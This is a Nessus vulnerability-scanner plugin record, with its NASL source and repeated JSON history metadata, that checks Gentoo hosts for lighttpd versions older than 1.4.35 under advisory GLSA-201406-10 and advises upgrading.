ID GENTOO_GLSA-201406-10.NASL Type nessus Reporter This script is Copyright (C) 2014-2018 Tenable Network Security, Inc. Modified 2019-11-02T00:00:00
Description
The remote host is affected by the vulnerability described in GLSA-201406-10
(lighttpd: Multiple vulnerabilities)
Multiple vulnerabilities have been discovered in lighttpd. Please review
the CVE identifiers referenced below for details.
Impact :
A remote attacker could create a Denial of Service condition.
Futhermore, a remote attacker may be able to execute arbitrary SQL
statements.
Workaround :
There is no known workaround at this time.
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from Gentoo Linux Security Advisory GLSA 201406-10.
#
# The advisory text is Copyright (C) 2001-2016 Gentoo Foundation, Inc.
# and licensed under the Creative Commons - Attribution / Share Alike
# license. See http://creativecommons.org/licenses/by-sa/3.0/
#
include("compat.inc");
if (description)
{
script_id(76062);
script_version("1.6");
script_cvs_date("Date: 2018/07/12 19:01:15");
script_cve_id("CVE-2011-4362", "CVE-2012-5533", "CVE-2013-4508", "CVE-2013-4559", "CVE-2013-4560", "CVE-2014-2323");
script_bugtraq_id(50851, 56619, 63534, 63686, 63688, 66153);
script_xref(name:"GLSA", value:"201406-10");
script_name(english:"GLSA-201406-10 : lighttpd: Multiple vulnerabilities");
script_summary(english:"Checks for updated package(s) in /var/db/pkg");
script_set_attribute(
attribute:"synopsis",
value:
"The remote Gentoo host is missing one or more security-related
patches."
);
script_set_attribute(
attribute:"description",
value:
"The remote host is affected by the vulnerability described in GLSA-201406-10
(lighttpd: Multiple vulnerabilities)
Multiple vulnerabilities have been discovered in lighttpd. Please review
the CVE identifiers referenced below for details.
Impact :
A remote attacker could create a Denial of Service condition.
Futhermore, a remote attacker may be able to execute arbitrary SQL
statements.
Workaround :
There is no known workaround at this time."
);
script_set_attribute(
attribute:"see_also",
value:"https://security.gentoo.org/glsa/201406-10"
);
script_set_attribute(
attribute:"solution",
value:
"All lighttpd users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose '>=www-servers/lighttpd-1.4.35'"
);
script_set_cvss_base_vector("CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C");
script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"plugin_type", value:"local");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:gentoo:linux:lighttpd");
script_set_attribute(attribute:"cpe", value:"cpe:/o:gentoo:linux");
script_set_attribute(attribute:"patch_publication_date", value:"2014/06/13");
script_set_attribute(attribute:"plugin_publication_date", value:"2014/06/16");
script_end_attributes();
script_category(ACT_GATHER_INFO);
script_copyright(english:"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.");
script_family(english:"Gentoo Local Security Checks");
script_dependencies("ssh_get_info.nasl");
script_require_keys("Host/local_checks_enabled", "Host/Gentoo/release", "Host/Gentoo/qpkg-list");
exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("qpkg.inc");
if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
if (!get_kb_item("Host/Gentoo/release")) audit(AUDIT_OS_NOT, "Gentoo");
if (!get_kb_item("Host/Gentoo/qpkg-list")) audit(AUDIT_PACKAGE_LIST_MISSING);
flag = 0;
if (qpkg_check(package:"www-servers/lighttpd", unaffected:make_list("ge 1.4.35"), vulnerable:make_list("lt 1.4.35"))) flag++;
if (flag)
{
if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());
else security_hole(0);
exit(0);
}
else
{
tested = qpkg_tests_get();
if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
else audit(AUDIT_PACKAGE_NOT_INSTALLED, "lighttpd");
}
{"id": "GENTOO_GLSA-201406-10.NASL", "bulletinFamily": "scanner", "title": "GLSA-201406-10 : lighttpd: Multiple vulnerabilities", "description": "The remote host is affected by the vulnerability described in GLSA-201406-10\n(lighttpd: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in lighttpd. Please review\n the CVE identifiers referenced below for details.\n \nImpact :\n\n A remote attacker could create a Denial of Service condition.\n Futhermore, a remote attacker may be able to execute arbitrary SQL\n statements.\n \nWorkaround :\n\n There is no known workaround at this time.", "published": "2014-06-16T00:00:00", "modified": "2019-11-02T00:00:00", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}, "href": "https://www.tenable.com/plugins/nessus/76062", "reporter": "This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.", "references": ["https://security.gentoo.org/glsa/201406-10"], "cvelist": ["CVE-2013-4508", "CVE-2014-2323", "CVE-2012-5533", "CVE-2013-4560", "CVE-2013-4559", "CVE-2011-4362"], "type": "nessus", "lastseen": "2019-11-01T02:40:33", "history": [{"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:lighttpd"], "cvelist": ["CVE-2013-4508", "CVE-2014-2323", "CVE-2012-5533", "CVE-2013-4560", "CVE-2013-4559", "CVE-2011-4362"], "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "The remote host is affected by the vulnerability described in GLSA-201406-10 (lighttpd: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in lighttpd. Please review the CVE identifiers referenced below for details.\n Impact :\n\n A remote attacker could create a Denial of Service condition.\n Futhermore, a remote attacker may be able to execute arbitrary SQL statements.\n Workaround :\n\n There is no known workaround at this time.", "edition": 3, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "b5ed92c198c303f0e003edabcb645b031bb5113e201725ea6557070fd61f9431", "hashmap": [{"hash": "6c5dba810aeab70d01eba769ffba08ab", "key": "references"}, {"hash": "9ee165aded032a2baf9a181faf11a74c", "key": "pluginID"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "4e75371be5bbd5341cf892fef0e9c013", "key": "title"}, {"hash": "774fce555a963c00be305187dd6dff95", "key": "cvss"}, {"hash": "f346bc8435b78109bc682f41b009e5b5", "key": "cvelist"}, {"hash": "20ba12b0faa8a5525529ad167476e074", "key": "published"}, {"hash": "349e4405289c3c80feb5483aec6488bd", "key": "href"}, {"hash": "c0470adc003771bc6ae5d6914349f929", "key": "cpe"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "ed8cba01682fb0f90eb366101e3256da", "key": "description"}, {"hash": "650bdfae1cb37826e27306825abaf826", "key": "sourceData"}, {"hash": "f5e850f1985da305c7f9475708cd4d52", "key": "modified"}, {"hash": "cf18d881f0f76f23f322ed3f861d3616", "key": "naslFamily"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=76062", "id": "GENTOO_GLSA-201406-10.NASL", "lastseen": "2018-07-13T09:41:04", "modified": "2018-07-12T00:00:00", "naslFamily": "Gentoo Local Security Checks", "objectVersion": "1.3", "pluginID": "76062", "published": "2014-06-16T00:00:00", "references": ["https://security.gentoo.org/glsa/201406-10"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201406-10.\n#\n# The advisory text is Copyright (C) 2001-2016 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(76062);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2018/07/12 19:01:15\");\n\n script_cve_id(\"CVE-2011-4362\", \"CVE-2012-5533\", \"CVE-2013-4508\", \"CVE-2013-4559\", \"CVE-2013-4560\", \"CVE-2014-2323\");\n script_bugtraq_id(50851, 56619, 63534, 63686, 63688, 66153);\n script_xref(name:\"GLSA\", value:\"201406-10\");\n\n script_name(english:\"GLSA-201406-10 : lighttpd: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201406-10\n(lighttpd: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in lighttpd. Please review\n the CVE identifiers referenced below for details.\n \nImpact :\n\n A remote attacker could create a Denial of Service condition.\n Futhermore, a remote attacker may be able to execute arbitrary SQL\n statements.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201406-10\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All lighttpd users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=www-servers/lighttpd-1.4.35'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:lighttpd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/06/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/16\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"www-servers/lighttpd\", unaffected:make_list(\"ge 1.4.35\"), vulnerable:make_list(\"lt 1.4.35\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"lighttpd\");\n}\n", "title": "GLSA-201406-10 : lighttpd: Multiple vulnerabilities", "type": "nessus", "viewCount": 0}, "differentElements": ["cvss"], "edition": 3, "lastseen": "2018-07-13T09:41:04"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:lighttpd"], "cvelist": ["CVE-2013-4508", "CVE-2014-2323", "CVE-2012-5533", "CVE-2013-4560", "CVE-2013-4559", "CVE-2011-4362"], "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}, "description": "The remote host is affected by the vulnerability described in GLSA-201406-10\n(lighttpd: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in lighttpd. Please review\n the CVE identifiers referenced below for details.\n \nImpact :\n\n A remote attacker could create a Denial of Service condition.\n Futhermore, a remote attacker may be able to execute arbitrary SQL\n statements.\n \nWorkaround :\n\n There is no known workaround at this time.", "edition": 8, "enchantments": {"dependencies": {"modified": "2019-10-28T20:24:09", "references": [{"idList": ["SUSE-SU-2014:0474-1", "OPENSUSE-SU-2014:0449-1"], "type": "suse"}, {"idList": ["PACKETSTORM:118282"], "type": "packetstorm"}, {"idList": ["1337DAY-ID-17319"], "type": "zdt"}, {"idList": ["CVE-2013-4508", "CVE-2014-2323", "CVE-2012-5533", "CVE-2013-4560", "CVE-2013-4559", "CVE-2011-4362"], "type": "cve"}, {"idList": ["EDB-ID:22902", "EDB-ID:18295"], "type": "exploitdb"}, {"idList": ["GLSA-201406-10"], "type": "gentoo"}, {"idList": ["SECURITYVULNS:VULN:12116", "SECURITYVULNS:DOC:27504", "SECURITYVULNS:DOC:27485", "SECURITYVULNS:DOC:30003", "SECURITYVULNS:VULN:13405"], "type": "securityvulns"}, {"idList": ["OPENVAS:867539", "OPENVAS:1361412562310120553", "OPENVAS:1361412562310120162", "OPENVAS:1361412562310867539", "OPENVAS:867540", "OPENVAS:1361412562310121213", "OPENVAS:866877", "OPENVAS:1361412562310867540", "OPENVAS:892795", "OPENVAS:1361412562310892795"], "type": "openvas"}, {"idList": ["LIGHTTPD_1_4_34.NASL", "MANDRIVA_MDVSA-2013-277.NASL", "FEDORA_2014-2506.NASL", "DEBIAN_DSA-2795.NASL", "FEDORA_2014-2495.NASL", "OPENSUSE-2012-801.NASL", "OPENSUSE-2014-43.NASL", "FEDORA_2013-15345.NASL", "FREEBSD_PKG_90B27045953011E39D09000C2980A9F3.NASL", "ALA_ALAS-2014-299.NASL"], "type": "nessus"}, {"idList": ["1CD3CA42-33E6-11E2-A255-5404A67EEF98", "C6521B04-314B-11E1-9CF4-5404A67EEF98", "90B27045-9530-11E3-9D09-000C2980A9F3"], "type": "freebsd"}, {"idList": ["MYHACK58:62201788804"], "type": "myhack58"}, {"idList": ["DEBIAN:DSA-2381-:320B8", "DEBIAN:DSA-2877-1:CD2D1", "DEBIAN:DSA-2795-1:2DAAE", "DEBIAN:DSA-2368-1:91542"], "type": "debian"}, {"idList": ["SSV:60476", "SSV:72453", "SSV:61980", "SSV:24275", "SSV:76695", "SSV:30003", "SSV:26120"], "type": "seebug"}, {"idList": ["ALAS-2013-179", "ALAS-2014-299", "ALAS-2014-346", "ALAS-2012-107"], "type": "amazon"}]}, "score": {"modified": "2019-10-28T20:24:09", "value": 8.2, "vector": "NONE"}}, "hash": "204424037ef0d6f651416ca773f117e611bcf9c45eca5f721367573af08b8b37", "hashmap": [{"hash": "6c5dba810aeab70d01eba769ffba08ab", "key": "references"}, {"hash": "9ee165aded032a2baf9a181faf11a74c", "key": "pluginID"}, {"hash": "ed80408f65b06df34ed6dfdb743af507", "key": "cvss"}, {"hash": "eebc0e5cad997220d136d9e0c6386556", "key": "reporter"}, {"hash": "4e75371be5bbd5341cf892fef0e9c013", "key": "title"}, {"hash": "f346bc8435b78109bc682f41b009e5b5", "key": "cvelist"}, {"hash": "20ba12b0faa8a5525529ad167476e074", "key": "published"}, {"hash": "c0470adc003771bc6ae5d6914349f929", "key": "cpe"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "0bafb6325bcaf483a25404f785191cc5", "key": "modified"}, {"hash": "650bdfae1cb37826e27306825abaf826", "key": "sourceData"}, {"hash": "cf18d881f0f76f23f322ed3f861d3616", "key": "naslFamily"}, {"hash": "38a5f873bbf7b0934702849e098af575", "key": "href"}, {"hash": "a05ab3ced445f2578684b24e5a530e18", "key": "description"}], "history": [], "href": "https://www.tenable.com/plugins/nessus/76062", "id": "GENTOO_GLSA-201406-10.NASL", "lastseen": "2019-10-28T20:24:09", "modified": "2019-10-02T00:00:00", "naslFamily": "Gentoo Local Security Checks", "objectVersion": "1.3", "pluginID": "76062", "published": "2014-06-16T00:00:00", "references": ["https://security.gentoo.org/glsa/201406-10"], "reporter": "This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201406-10.\n#\n# The advisory text is Copyright (C) 2001-2016 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(76062);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2018/07/12 19:01:15\");\n\n script_cve_id(\"CVE-2011-4362\", \"CVE-2012-5533\", \"CVE-2013-4508\", \"CVE-2013-4559\", \"CVE-2013-4560\", \"CVE-2014-2323\");\n script_bugtraq_id(50851, 56619, 63534, 63686, 63688, 66153);\n script_xref(name:\"GLSA\", value:\"201406-10\");\n\n script_name(english:\"GLSA-201406-10 : lighttpd: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201406-10\n(lighttpd: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in lighttpd. Please review\n the CVE identifiers referenced below for details.\n \nImpact :\n\n A remote attacker could create a Denial of Service condition.\n Futhermore, a remote attacker may be able to execute arbitrary SQL\n statements.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201406-10\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All lighttpd users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=www-servers/lighttpd-1.4.35'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:lighttpd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/06/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/16\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"www-servers/lighttpd\", unaffected:make_list(\"ge 1.4.35\"), vulnerable:make_list(\"lt 1.4.35\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"lighttpd\");\n}\n", "title": "GLSA-201406-10 : lighttpd: Multiple vulnerabilities", "type": "nessus", "viewCount": 5}, "differentElements": ["modified"], "edition": 8, "lastseen": "2019-10-28T20:24:09"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:lighttpd"], "cvelist": ["CVE-2013-4508", "CVE-2014-2323", "CVE-2012-5533", "CVE-2013-4560", "CVE-2013-4559", "CVE-2011-4362"], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "The remote host is affected by the vulnerability described in GLSA-201406-10 (lighttpd: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in lighttpd. Please review the CVE identifiers referenced below for details.\n Impact :\n\n A remote attacker could create a Denial of Service condition.\n Futhermore, a remote attacker may be able to execute arbitrary SQL statements.\n Workaround :\n\n There is no known workaround at this time.", "edition": 4, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "2947d1d3bc47ce7f7bd60d59f246d5158a909f34f81bcde7bd5cbe69aec43340", "hashmap": [{"hash": "6c5dba810aeab70d01eba769ffba08ab", "key": "references"}, {"hash": "9ee165aded032a2baf9a181faf11a74c", "key": "pluginID"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "4e75371be5bbd5341cf892fef0e9c013", "key": "title"}, {"hash": "f346bc8435b78109bc682f41b009e5b5", "key": "cvelist"}, {"hash": "20ba12b0faa8a5525529ad167476e074", "key": "published"}, {"hash": "349e4405289c3c80feb5483aec6488bd", "key": "href"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "c0470adc003771bc6ae5d6914349f929", "key": "cpe"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "ed8cba01682fb0f90eb366101e3256da", "key": "description"}, {"hash": "650bdfae1cb37826e27306825abaf826", "key": "sourceData"}, {"hash": "f5e850f1985da305c7f9475708cd4d52", "key": "modified"}, {"hash": "cf18d881f0f76f23f322ed3f861d3616", "key": "naslFamily"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=76062", "id": "GENTOO_GLSA-201406-10.NASL", "lastseen": "2018-08-30T19:34:48", "modified": "2018-07-12T00:00:00", "naslFamily": "Gentoo Local Security Checks", "objectVersion": "1.3", "pluginID": "76062", "published": "2014-06-16T00:00:00", "references": ["https://security.gentoo.org/glsa/201406-10"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201406-10.\n#\n# The advisory text is Copyright (C) 2001-2016 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(76062);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2018/07/12 19:01:15\");\n\n script_cve_id(\"CVE-2011-4362\", \"CVE-2012-5533\", \"CVE-2013-4508\", \"CVE-2013-4559\", \"CVE-2013-4560\", \"CVE-2014-2323\");\n script_bugtraq_id(50851, 56619, 63534, 63686, 63688, 66153);\n script_xref(name:\"GLSA\", value:\"201406-10\");\n\n script_name(english:\"GLSA-201406-10 : lighttpd: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201406-10\n(lighttpd: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in lighttpd. Please review\n the CVE identifiers referenced below for details.\n \nImpact :\n\n A remote attacker could create a Denial of Service condition.\n Futhermore, a remote attacker may be able to execute arbitrary SQL\n statements.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201406-10\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All lighttpd users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=www-servers/lighttpd-1.4.35'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:lighttpd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/06/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/16\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"www-servers/lighttpd\", unaffected:make_list(\"ge 1.4.35\"), vulnerable:make_list(\"lt 1.4.35\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"lighttpd\");\n}\n", "title": "GLSA-201406-10 : lighttpd: Multiple vulnerabilities", "type": "nessus", "viewCount": 0}, "differentElements": ["cvss"], "edition": 4, "lastseen": "2018-08-30T19:34:48"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:lighttpd"], "cvelist": ["CVE-2013-4508", "CVE-2014-2323", "CVE-2012-5533", "CVE-2013-4560", "CVE-2013-4559", "CVE-2011-4362"], "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "The remote host is affected by the vulnerability described in GLSA-201406-10 (lighttpd: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in lighttpd. Please review the CVE identifiers referenced below for details.\n Impact :\n\n A remote attacker could create a Denial of Service condition.\n Futhermore, a remote attacker may be able to execute arbitrary SQL statements.\n Workaround :\n\n There is no known workaround at this time.", "edition": 2, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "2c07a9704b62a4fe5f667357e64028da8a222c6c1e3966bfd093af7eecdaa601", "hashmap": [{"hash": "6c5dba810aeab70d01eba769ffba08ab", "key": "references"}, {"hash": "9ee165aded032a2baf9a181faf11a74c", "key": "pluginID"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "4e75371be5bbd5341cf892fef0e9c013", "key": "title"}, {"hash": "774fce555a963c00be305187dd6dff95", "key": "cvss"}, {"hash": "0398ca8d1d69ac0e8ceaf9708dcea515", "key": "sourceData"}, {"hash": "8c669a229bb7e8ad8fcc835ab88c475a", "key": "modified"}, {"hash": "f346bc8435b78109bc682f41b009e5b5", "key": "cvelist"}, {"hash": "20ba12b0faa8a5525529ad167476e074", "key": "published"}, {"hash": "349e4405289c3c80feb5483aec6488bd", "key": "href"}, {"hash": "c0470adc003771bc6ae5d6914349f929", "key": "cpe"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "ed8cba01682fb0f90eb366101e3256da", "key": "description"}, {"hash": "cf18d881f0f76f23f322ed3f861d3616", "key": "naslFamily"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=76062", "id": "GENTOO_GLSA-201406-10.NASL", "lastseen": "2017-10-29T13:35:36", "modified": "2016-05-12T00:00:00", "naslFamily": "Gentoo Local Security Checks", "objectVersion": "1.3", "pluginID": "76062", "published": "2014-06-16T00:00:00", "references": ["https://security.gentoo.org/glsa/201406-10"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201406-10.\n#\n# The advisory text is Copyright (C) 2001-2016 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(76062);\n script_version(\"$Revision: 1.5 $\");\n script_cvs_date(\"$Date: 2016/05/12 14:46:29 $\");\n\n script_cve_id(\"CVE-2011-4362\", \"CVE-2012-5533\", \"CVE-2013-4508\", \"CVE-2013-4559\", \"CVE-2013-4560\", \"CVE-2014-2323\");\n script_bugtraq_id(50851, 56619, 